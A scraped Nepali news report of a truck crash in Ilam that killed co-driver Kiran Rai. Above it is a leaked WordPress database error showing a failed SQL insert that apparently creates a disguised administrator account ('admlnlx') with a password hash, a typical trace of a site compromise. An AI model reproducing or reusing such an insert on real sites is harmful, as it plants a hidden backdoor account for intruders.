WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BGK6z34Rb76BLwznmMh25LSRgb3KH51', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 19:58:56', '', 'admlnlx', 'admlnlx')
पाँचथर । पाँचथरको रविबाट झापा जाँदै गरेको ट्रक दुर्घटना हुँदा सहचालकको मृत्यु भएको छ । आज बिहान पाँचथरको मिक्लाजुङ गाउँपालिका–४ रविबाट गोलिया बोकेर झापाको दमकतर्फ गइरहेको ना ३ ख २०५ नम्बरको ट्रक दुर्घटना हुँदा ट्रकका सहचालक पाँचथरको मिक्लाजुङ–४ का ३५ वर्षीय किरण राईको मृत्यु भएको हो ।
ट्रक आफैँ अनियन्त्रित भई इलामको माङसेबुङ गाउँपालिका–२ भोटेडाँडामा सडकबाट करीब २०० मिटर तल झरेको जिल्ला प्रहरी कार्यालय इलामले जनाएको छ । दुर्घटनामा घाइते भएका सहचालक राईलाई उपचारका लागि दमकतर्फ लैजाने क्रममा बाटैमा मृत्यु भएको हो ।